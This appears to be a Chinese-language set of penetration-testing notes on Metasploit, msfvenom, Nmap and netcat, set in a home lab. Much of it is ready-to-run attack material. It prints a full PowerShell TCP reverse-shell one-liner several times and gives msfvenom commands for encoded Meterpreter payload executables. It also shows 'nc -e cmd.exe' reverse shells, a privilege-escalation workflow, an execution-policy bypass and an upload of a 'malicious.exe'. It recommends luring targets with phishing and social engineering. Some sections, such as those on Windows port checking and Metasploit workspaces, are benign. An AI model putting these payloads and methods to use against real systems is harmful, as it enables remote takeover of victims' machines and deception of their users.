#无文件 #PowerShell #反向木马 #ReverseShell #Metasploit #Windows #powershell #reverse #tcp #Meterpreter #渗透测试

msf6 > use exploit/multi/handler
msf6 > set payload windows/shell_reverse_tcp

> msfvenom -p windows/shell_reverse_tcp LHOST=192.168.5.229 LPORT=4444 -e cmd/powershell_base64 -f psh-cmd > reverse.ps1
1. 开启监听
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
2. 生成powershell command命令
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.229 LPORT=4444 -e cmd/powershell_base64 -f psh-cmd > reverse.ps1
3. 提权
meterpreter > getsystem #拿不到权限
meterpreter > bg

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.5.233 - Collecting local exploits for x86/windows...
[*] 192.168.5.233 - 196 exploit checks are being tried...
[+] 192.168.5.233 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
……

扫出可以提权的exploit,随便使用一个提权
❯ msfvenom use --list encoders to list

Framework Encoders [--encoder <value>]
======================================

Name Rank Description
---- ---- -----------
cmd/base64 good Base64 Command Encoder
cmd/brace low Bash Brace Expansion Command Encoder
cmd/echo good Echo Command Encoder
cmd/generic_sh manual Generic Shell Variable Substitution C
ommand Encoder
cmd/ifs low Bourne ${IFS} Substitution Command En
coder
cmd/perl normal Perl Command Encoder
cmd/powershell_base64 excellent Powershell Base64 Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utilit
y Command Encoder
generic/eicar manual The EICAR Encoder
generic/none normal The "none" Encoder
mipsbe/byte_xori normal Byte XORi Encoder
mipsbe/longxor normal XOR Encoder
mipsle/byte_xori normal Byte XORi Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 Encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
ruby/base64 great Ruby Base64 Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x64/xor_context normal Hostname-based Context Keyed Payload
Encoder
x64/xor_dynamic normal Dynamic key XOR Encoder
x64/zutto_dekiru manual Zutto Dekiru
x86/add_sub manual Add/Sub Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_t manual Avoid underscore/tolower
olower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/bloxor manual BloXor - A Metamorphic Block Based XO
R Encoder
x86/bmp_polyglot manual BMP Polyglot
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Enc
oder
x86/context_stat manual stat(2)-based Context Keyed Payload E
ncoder
x86/context_time manual time(2)-based Context Keyed Payload E
ncoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR
Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encod
er
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/opt_sub manual Sub Encoder (optimised)
x86/service manual Register Service
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Enc
oder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase
Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase
Encoder
x86/xor_dynamic normal Dynamic key XOR Encoder
x86/xor_poly normal XOR POLY Encoder
### PowerShell Command 木马

PowerShell 是 Windows 系统内置的命令行脚本环境,因此在渗透测试中,攻击者常利用 PowerShell 脚本来执行恶意操作,而无需上传可执行文件。以下是使用 PowerShell 命令来生成和执行反向木马的一些常见步骤。

#### 1. 生成 PowerShell 反向木马命令

PowerShell 反向木马允许攻击者通过 PowerShell 执行命令来建立一个远程会话,这样可以在目标系统上执行命令、获取信息或者控制目标。

使用 msfvenom 生成 PowerShell 反向木马命令:

msfvenom -p windows/powershell_reverse_tcp LHOST=<攻击者IP> LPORT=<攻击者端口> -f raw


例如:

msfvenom -p windows/powershell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw


这将生成一个 PowerShell 反向连接的命令,如下所示:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII.GetBytes($sendback2));$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


解释:
- `LHOST=192.168.1.100`:攻击者的 IP 地址。
- `LPORT=4444`:监听端口。
- `-f raw`:输出原始的 PowerShell 命令。

这段命令通过创建一个 TCP 客户端,连接到攻击者指定的主机和端口,并通过流将输入的 PowerShell 命令执行,然后将结果返回给攻击者。

#### 2. 启动 Metasploit 监听器

在 Metasploit 中启动 `multi/handler` 模块并监听反向连接:

msfconsole
use exploit/multi/handler
set payload windows/powershell_reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
run


- `set LHOST 192.168.1.100`:设置攻击者的 IP 地址。
- `set LPORT 4444`:设置监听的端口。
- `run`:启动监听等待目标机器的反向连接。

#### 3. 在目标系统上执行 PowerShell 命令

将上面生成的 PowerShell 反向木马命令传递给目标机器并在目标机器上执行。可以通过以下方式执行:

1. **直接在 PowerShell 中执行**:
在目标机器上打开 PowerShell 窗口并直接粘贴命令进行执行。

   powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII.GetBytes($sendback2));$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
   


2. **通过社会工程学手段执行**:
通过社会工程学手段诱使目标用户执行该命令。例如,通过邮件、钓鱼网站或者在目标机器上放置一个伪装的 PowerShell 脚本,诱使用户运行。

3. **通过文件执行**:
将 PowerShell 反向木马命令保存为 .ps1 脚本文件,例如 `reverse.ps1`,然后通过以下命令执行:

   powershell -ExecutionPolicy Bypass -File reverse.ps1
   


-ExecutionPolicy Bypass 用于绕过 PowerShell 的执行策略,允许执行脚本。

#### 4. 接收反向连接

当目标机器执行 PowerShell 命令时,Metasploit 控制台将显示以下信息,表示已经成功获得目标的反向连接:

[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending stage (179779 bytes) to 192.168.5.233
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.5.233:4444) at 2024-11-09 22:14:57 -0500


此时,你可以通过 Meterpreter 会话进行各种操作,如获取系统信息、执行命令、上传/下载文件等。

#### 5. 后续操作

通过反向连接,你可以执行一系列操作。例如,查看系统信息:

sysinfo


或者上传恶意文件:

upload /path/to/malicious/file C:\Users\Public\malicious.exe


#### 总结

PowerShell 反向木马是一个强大且隐蔽的攻击方式。它无需依赖可执行文件,而是通过 PowerShell 直接在目标机器上执行恶意命令。通过适当的社会工程学技巧或合法的管理工具,可以绕过防火墙和其他安全措施,进行渗透测试和攻击。

### 关键词
#PowerShell #反向木马 #ReverseShell #Metasploit #windows/powershell_reverse_tcp #Meterpreter #渗透测试
### 使用 PowerShell 命令生成反向木马

在渗透测试中,有时会选择使用 PowerShell 作为载体来执行反向连接命令。这种方式不需要生成可执行文件(exe),而是利用 PowerShell 脚本直接从目标机器发起反向连接到攻击者的机器。

Metasploit 提供了一个 PowerShell 反向 shell payload,可以帮助你生成和执行这种反向木马。

#### 步骤 1:生成 PowerShell 反向连接命令

使用 msfvenom 来生成 PowerShell 反向连接命令,避免将恶意文件上传到目标机器,而是通过 PowerShell 直接执行命令。

1. **生成 PowerShell 反向木马命令**:

假设攻击者的 IP 地址是 `192.168.5.100`,端口是 `4444`,执行以下命令生成 PowerShell 反向 shell:

   msfvenom -p windows/powershell_reverse_tcp LHOST=192.168.5.100 LPORT=4444 -f raw
   


- `-p windows/powershell_reverse_tcp`:选择 PowerShell 反向连接 payload。
- `LHOST=192.168.5.100`:设置攻击者的 IP 地址。
- `LPORT=4444`:设置监听的端口。
- `-f raw`:生成原始的 PowerShell 命令。

输出将是类似这样的 PowerShell 命令:

   powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.5.100',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII.GetBytes($sendback2));$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
   


这个命令会启动一个 PowerShell 反向连接并连接到攻击者的机器。

#### 步骤 2:设置 Metasploit 监听器

1. **启动 Metasploit 控制台并设置监听器**:

启动 Metasploit 并使用 `multi/handler` 模块来监听目标机器的反向连接。

   msfconsole
   


2. **设置监听器参数**:

在 Metasploit 控制台中执行以下命令来设置监听器:

   use exploit/multi/handler
   set payload windows/powershell_reverse_tcp
   set LHOST 192.168.5.100
   set LPORT 4444
   run
   


- `use exploit/multi/handler`:选择通用的处理程序。
- `set payload windows/powershell_reverse_tcp`:选择 PowerShell 反向连接 payload。
- `set LHOST 192.168.5.100`:设置攻击者的 IP 地址。
- `set LPORT 4444`:设置监听的端口。

3. **开始监听反向连接**:

执行 `run` 启动监听,等待目标执行 PowerShell 命令并反向连接。

#### 步骤 3:在目标机器上执行 PowerShell 命令

将上面生成的 PowerShell 命令复制到目标机器上并通过 PowerShell 执行。可以使用以下几种方式之一来执行:

1. **直接在 PowerShell 中执行命令**:

通过手动输入或在目标机器的 PowerShell 命令行中执行命令。

2. **通过文件执行**:

可以将该命令写入一个 PowerShell 脚本文件(例如 `reverse.ps1`),然后执行该文件:

   powershell -ExecutionPolicy Bypass -File reverse.ps1
   


3. **通过社会工程学**:

可以通过钓鱼邮件、社交工程等方式诱使目标用户执行该命令。

#### 步骤 4:接收反向连接

一旦目标执行 PowerShell 命令,你将会在 Metasploit 控制台中看到类似以下输出:

[*] Started reverse TCP handler on 192.168.5.100:4444 
[*] Sending stage (179779 bytes) to 192.168.5.233
[*] Meterpreter session 1 opened (192.168.5.100:4444 -> 192.168.5.233:4444) at 2024-11-09 22:14:57 -0500


这意味着你已经成功获取了目标机器的 Meterpreter 会话,可以继续执行各种渗透测试任务。

#### 步骤 5:后续操作

一旦建立反向连接,你可以通过 Meterpreter 执行各种操作,如:

- 获取系统信息
- 上传/下载文件
- 执行系统命令

例如,使用以下命令获取目标机器的系统信息:

sysinfo


### 总结

PowerShell 反向木马是一种不依赖于上传可执行文件的反向连接方式,它通过 PowerShell 脚本直接从目标机器反向连接到攻击者机器。这种方式隐蔽性较高,且容易被利用。

### 关键词
#Metasploit #PowerShell #ReverseShell #反向木马 #Meterpreter #windows/powershell_reverse_tcp
### 使用 Nmap 进行目录扫描(基于字典)

Nmap 本身并不内置专门用于目录扫描的功能,但可以通过 http-enum 脚本与字典结合,进行目录扫描。

### 使用 http-enum 脚本扫描目录

1. **指定字典文件**:
http-enum 脚本支持通过 --script-args 参数传递字典文件来进行目录扫描。字典文件应该是一个包含潜在目录名称的文本文件(例如,`dir-2000.txt`)。

2. **命令格式**:
你可以使用以下命令进行目录扫描:
   nmap -p 80 --script http-enum --script-args http-enum.paths=/path/to/your/dictionary.txt 192.168.5.233
   


- `-p 80`:扫描目标主机的 80 端口。
- --script http-enum`:使用 Nmap 的 `http-enum 脚本。
- `--script-args http-enum.paths=/path/to/your/dictionary.txt`:指定字典文件路径。
- `192.168.5.233`:目标主机的 IP 地址。

### 配置字典文件
你可以使用一些常见的字典文件,比如 `dir-2000.txt`、`common.txt` 或者你自定义的字典文件。

#### 示例:
假设你有一个字典文件 dir-2000.txt`,并且你将其放置在 /home/kali/dir-2000.txt` 路径下,命令如下:
nmap -p 80 --script http-enum --script-args http-enum.paths=/home/kali/dir-2000.txt 192.168.5.233


### 扫描结果
Nmap 会根据字典中的目录列表,扫描每一个可能的目录并尝试访问,如果找到有效的目录,会在结果中显示出来。

### 注意事项
- http-enum 脚本会尝试请求每个目录并根据 HTTP 响应码判断是否存在该目录。例如,响应 200 表示目录存在,而 404 表示目录不存在。
- 扫描时,如果目标站点的目录结构比较复杂,或者存在很多目录,这个扫描可能会比较慢。

### 示例输出
如果扫描成功,输出可能如下所示:
Nmap scan report for 192.168.5.233
Host is up (0.0010s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-enum:
|   /admin/: Found directory
|   /images/: Found directory
|   /uploads/: Found directory
|   /login/: Found directory
|_  /assets/: Found directory

Nmap done: 1 IP address (1 host up) scanned in 8.92 seconds


### 总结
使用 nmaphttp-enum 脚本配合字典文件,可以高效地扫描目标网站的潜在目录。确保字典文件路径正确,且脚本已根据需求进行配置。

### 关键词
#Nmap #http-enum #目录扫描 #字典扫描 #漏洞扫描
### Nmap 导出 XML,然后在 Metasploit 中导入

Nmap 可以将扫描结果导出为 XML 格式,Metasploit 可以通过 db_import 命令导入这些 Nmap 的扫描结果。这个过程可以帮助您将 Nmap 扫描得到的结果直接存储到 Metasploit 的数据库中,方便后续分析和利用。

### 步骤 1:用 Nmap 执行扫描并导出 XML

首先,使用 Nmap 执行扫描并将结果保存为 XML 文件。您可以使用以下命令执行 Nmap 扫描:

nmap -p 80 --script vuln -T4 -oX nmap_results.xml 192.168.5.233


- -oX nmap_results.xml 选项指定将扫描结果导出为 XML 文件。
- --script vuln 用于运行漏洞扫描脚本。

### 步骤 2:将 Nmap XML 文件导入 Metasploit

完成扫描后,使用 Metasploit 的 db_import 命令导入 Nmap 导出的 XML 文件。首先确保 Metasploit 已连接到数据库,然后执行以下命令:

msf6 > db_import /path/to/nmap_results.xml


- /path/to/nmap_results.xml 替换为您的实际文件路径。
- Metasploit 会解析 Nmap 导出的 XML 文件,并将结果导入数据库,包括主机、服务、漏洞等信息。

### 步骤 3:验证导入的数据

导入完成后,您可以通过 Metasploit 的 hosts`、`servicesvulns 等命令来查看数据库中的信息:

msf6 > hosts
msf6 > services
msf6 > vulns


### 示例

假设您已经在 192.168.5.233 上运行了 Nmap 扫描并导出了 XML 文件,接下来将其导入 Metasploit 数据库:

1. 执行 Nmap 扫描并导出 XML:

   nmap -p 80 --script vuln -T4 -oX nmap_results.xml 192.168.5.233
   


2. 导入 XML 文件到 Metasploit:

   msf6 > db_import /path/to/nmap_results.xml
   


3. 验证导入数据:

   msf6 > hosts
   msf6 > services
   msf6 > vulns
   


### 注意事项

- 确保 Nmap 执行时使用了合适的脚本来检测漏洞,否则扫描结果可能没有包含您需要的漏洞信息。
- 如果扫描结果太大或复杂,可能需要查看 Metasploit 的日志以确认导入是否成功。
- 确保在运行 db_import 命令时 Metasploit 正在连接到数据库,您可以使用 db_status 检查数据库连接状态。

### 关键词
#Nmap #Metasploit #db_import #XML #漏洞扫描 #导入扫描结果 #数据库
### 在 Metasploit 中对网段进行扫描并存储到工作区

Metasploit 提供了一些强大的功能来进行网络扫描和渗透测试,您可以将扫描结果存储到特定的工作区中,以便后续使用和分析。以下是如何在 Metasploit 中对一个网段进行扫描并将结果存储到特定工作区的步骤。

#### 1. 创建并切换工作区

首先,确保您已创建一个新的工作区,并切换到该工作区。您可以使用 workspace 命令创建和切换工作区。

- 创建一个新的工作区:
  workspace -a my_workspace
  


- 切换到已创建的工作区:
  workspace my_workspace
  


#### 2. 使用 `db_nmap` 扫描网段

Metasploit 提供了 db_nmap 命令,用于对网段进行扫描并将结果自动保存到数据库中(包含工作区)。`db_nmap` 是 nmap 命令的扩展,可以将 Nmap 扫描结果直接导入 Metasploit 数据库。

例如,要对整个网段进行扫描,您可以执行以下命令:

- 执行 Nmap 扫描并将结果存入数据库:
  db_nmap -sP 192.168.1.0/24
  


这个命令会执行一个简单的 Ping 扫描 (-sP),它会检查 192.168.1.0192.168.1.255 范围内的所有主机是否在线,并将结果存储到当前工作区的数据库中。

- 执行完整的端口扫描并存储结果:
  db_nmap -p 1-65535 192.168.1.0/24
  


这将扫描网段内的所有主机和端口,并将结果保存到数据库。

#### 3. 查看扫描结果

扫描完成后,您可以通过以下命令查看扫描到的主机、服务和漏洞信息:

- 查看扫描到的主机:
  hosts
  


- 查看扫描到的服务:
  services
  


- 查看漏洞信息:
  vulns
  


#### 4. 进一步操作

一旦您完成了扫描并收集了数据,您可以使用 Metasploit 中的其他模块(例如漏洞利用模块、攻击模块等)对扫描到的目标进行进一步渗透测试。

#### 示例命令:

msfconsole
workspace -a my_workspace    # 创建并切换到工作区
db_nmap -sS -p 80,443 192.168.1.0/24  # 执行 SYN 扫描,扫描 HTTP 和 HTTPS 端口
hosts                        # 查看扫描到的主机


### 关键词
#Metasploit #db_nmap #网段扫描 #工作区 #nmap扫描 #渗透测试
### 将攻击结果添加到 Metasploit 数据库中的方法

在 Metasploit 中,数据库用于存储和管理渗透测试过程中收集的数据,如扫描结果、漏洞信息、已利用的主机、有效载荷等。Metasploit 可以与数据库连接,以便更好地组织和跟踪攻击过程。

要将攻击结果添加到数据库,确保数据库已正确配置并与 Metasploit 集成。以下是配置和使用数据库存储攻击结果的基本步骤:

#### 1. 确保数据库已启用

Metasploit 使用 PostgreSQL 作为默认数据库。在启动 Metasploit 之前,确保 PostgreSQL 数据库已经启动并且 Metasploit 已经连接到数据库。

1. 启动 PostgreSQL 数据库:
   service postgresql start
   


2. 启动 Metasploit 并确保数据库连接正常:
   msfconsole
   


3. 在 Metasploit 控制台中检查数据库连接状态:
   db_status
   


如果数据库连接成功,会显示类似如下的输出:
   [*] Connected to the database.
   


如果没有连接到数据库,可以通过以下命令手动配置数据库连接:
   db_connect msf:password@localhost/msf
   


#### 2. 将攻击结果保存到数据库

一旦数据库连接成功,Metasploit 会自动将扫描和攻击的结果保存到数据库中。以下是几种常见情况:

- 扫描结果(例如 Nmap 扫描)**:
使用 `db_nmap` 命令进行扫描,结果会自动添加到数据库中:
```bash
db_nmap -sS
192.168.1.0/24
```

- **漏洞扫描和利用**:
执行漏洞扫描或利用(例如使用 `auxiliary` 模块或 `exploit` 模块)时,攻击的目标、成功与否、已执行的命令等结果会自动存储到数据库中。

- **查看数据库中的数据**:
使用 `hosts` 命令查看已记录的主机信息:
```bash
hosts
```

查看扫描的服务:
```bash
services
```

查看漏洞信息:
```bash
vulns
```

#### 3. **手动添加结果到数据库


在某些情况下,你可能希望手动将某些数据(如手动发现的漏洞)添加到数据库中。这可以通过 db_insert 等命令完成,但大多数情况下,Metasploit 会自动管理这些数据。

#### 4. 导出数据库中的数据

如果需要导出攻击数据进行报告或分析,可以使用 Metasploit 提供的导出功能。例如,使用 db_export 导出数据为 XML 格式:
db_export -f xml /path/to/output.xml


### 关键词
#Metasploit #数据库 #db_status #攻击结果 #db_nmap #渗透测试
### 在 Metasploit 中创建工作区的方法

在 Metasploit 中,工作区(Workspace)用于组织和管理不同的渗透测试项目和相关数据。每个工作区都可以独立存储扫描结果、漏洞信息、已利用的主机等,使得测试过程更加有序。创建和切换工作区是 Metasploit 操作中的常见步骤。

#### 创建工作区的步骤:
1. **启动 Metasploit 控制台**:
在终端中输入以下命令启动 Metasploit:
   msfconsole
   


2. **创建新的工作区**:
使用 workspace 命令来创建一个新的工作区。例如,创建名为 my_workspace 的工作区:
   workspace -a my_workspace
   

其中,`-a` 参数表示“添加”一个新工作区。

3. **查看当前工作区**:
使用以下命令查看当前活动的工作区:
   workspace
   


4. **切换工作区**:
如果你已经创建了多个工作区,可以通过以下命令切换到另一个工作区:
   workspace <workspace_name>
   


5. **列出所有工作区**:
使用以下命令列出所有已创建的工作区:
   workspace -l
   


#### 示例操作:
msfconsole
workspace -a my_test_workspace  # 创建工作区
workspace -l                   # 列出所有工作区
workspace my_test_workspace    # 切换到新创建的工作区


通过创建和管理多个工作区,Metasploit 能有效地将不同的渗透测试任务和数据分开,便于进行独立操作。

### 关键词
#Metasploit #工作区 #workspace #渗透测试 #msfconsole
### 关于 msfvenom 的介绍

msfvenom 是 Metasploit 框架中的一个重要工具,主要用于生成各种类型的有效载荷(payload),并将其编码为不同格式,以便进行渗透测试或漏洞利用。它结合了 msfpayloadmsfencode 的功能,使得生成并编码 payload 变得更加高效。

通过 msfvenom`,用户可以指定载荷类型、编码方式、目标平台等选项,生成适用于不同攻击场景的有效载荷。它支持多种格式输出,包括但不限于可执行文件、PHP、Python 脚本、Windows 格式等。`msfvenom 可以用于创建反向 Shell、Meterpreter 会话等攻击载荷。

常见的使用示例:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe > payload.exe

这个命令将生成一个 Windows 平台的 Meterpreter 反向 Shell,有效载荷通过 payload.exe 执行。

### 关键词
#msfvenom #Metasploit #有效载荷 #渗透测试 #反向Shell #Meterpreter
### 关于 msf-nasm_shell 的介绍

msf-nasm_shell 是 Metasploit 框架中的一个工具,专门用于提供一个交互式的汇编语言编辑器。通过该工具,用户可以在 Metasploit 环境下编写和修改汇编代码,主要用于生成有效的 shellcode。它通常与漏洞利用、渗透测试以及攻击载荷生成等活动相关联。

在使用时,用户可以输入汇编指令,并实时查看生成的机器码,以便通过 Metasploit 进一步使用。该工具能够简化 shellcode 的创建过程,尤其是在进行针对性的漏洞测试时。

### 关键词
#msf-nasm_shell #Metasploit #汇编 #shellcode #渗透测试
metasploit framework
查找可利用的提权漏洞
use post/multi/recon/local_exploit_suggester
生成木马
msfvenom -p windows/meterpreter/reverse_tcp LH0ST=192.168.5.229 LP0RT=4444 -e x86/shikata_ga_nai -i 5 -f exe > payload.exe
### 在 Windows 中查看本机端口使用情况

在 Windows 上查看端口使用情况,可以使用多种工具和命令。最常用的是通过 命令提示符 中的 netstat 命令或者 PowerShell**,以及 **资源监视器 来查看端口的使用情况。

### 1. 使用 `netstat` 命令

netstat 是一个非常常用的网络工具,可以查看当前网络连接、端口占用、以及网络统计信息。

#### 查看所有端口和连接状态:
netstat -an

- `-a`:显示所有连接和监听的端口。
- `-n`:以数字形式显示地址和端口(避免进行 DNS 解析)。

#### 查看特定端口的占用情况:
例如,查看 80 端口的占用情况:
netstat -an | findstr :80


#### 查看端口及其对应的进程:
要查看端口和对应的进程信息,可以使用:
netstat -ano

- `-o`:显示与每个连接相关的进程 ID(PID)。

查看特定端口与进程关联:
netstat -ano | findstr :80


#### 根据 PID 查找对应的程序:
通过 `netstat` 获得进程 ID(PID)后,可以在任务管理器中查找对应的进程,或者使用以下命令查看:
tasklist | findstr <PID>


### 2. 使用 PowerShell

PowerShell 提供了比 netstat 更强大的功能,能够轻松查看端口和进程的详细信息。

#### 查看所有监听端口:
Get-NetTCPConnection | Where-Object {$_.State -eq 'Listen'}

这将列出所有处于监听状态的 TCP 连接和端口。

#### 查看特定端口的占用情况:
Get-NetTCPConnection -LocalPort 80


#### 查看进程与端口映射关系:
Get-NetTCPConnection | Select-Object LocalAddress,LocalPort,State,OwningProcess

可以结合进程 ID(OwningProcess)查找具体进程。

### 3. 使用资源监视器(Resource Monitor)

Windows 资源监视器也提供了图形界面来查看端口的使用情况。

#### 步骤:
1. 打开任务管理器:右键任务栏,选择“任务管理器”。
2. 切换到“性能”标签页。
3. 点击“打开资源监视器”。
4. 在“网络”标签页下,点击“监听端口”部分,即可查看当前所有正在监听的端口及其对应的进程。

### 4. 使用 TCPView

[TCPView](https://docs.microsoft.com/en-us/sysinternals/downloads/tcpview) 是 Sysinternals 提供的一款小工具,可以实时显示所有端口的状态,包括每个端口的详细信息,且支持排序、刷新和杀死进程。

#### 使用步骤:
1. 下载并运行 TCPView 工具。
2. 它将列出所有活动的 TCP/UDP 端口,并显示每个端口的进程和状态。

### 总结

在 Windows 上查看端口使用情况,最常见的方式是使用 `netstat`、PowerShell 或资源监视器。根据需求,你可以选择使用命令行工具或图形化工具来查看本机端口的状态,进而了解系统的网络连接和端口占用情况。

#Windows #端口 #netstat #PowerShell #TCPView #资源监视器 #任务管理器 #网络配置 TCPView for Windows - Sysinternals
nc默认使用tcp协议,使用-u可以设置udp协议。

虚机​kali使用NAT模式时,可以设置tcp/udp端口转发,用宿主机win的ip+端口反弹shell。
# VMware 中反弹shell 时如何使用 IP 地址

1. 桥接

虚机 kali IP:192.168.5.226
宿主 windows IP:192.168.5.203

在 kali 开启监听`nc -lvnp 4444`,`nc -e cmd.exe 192.168.5.226 4444`



2. NAT

虚机 kali IP:192.168.153.128
宿主 windows IP:192.168.5.203
需要虚拟网络编辑器设置NAT端口转发(比如4444),使用 192.168.5.203:4444,在 kali 开启监听`nc -lvnp 4444`,`nc -e cmd.exe 192.168.5.203 4444`
Back to Top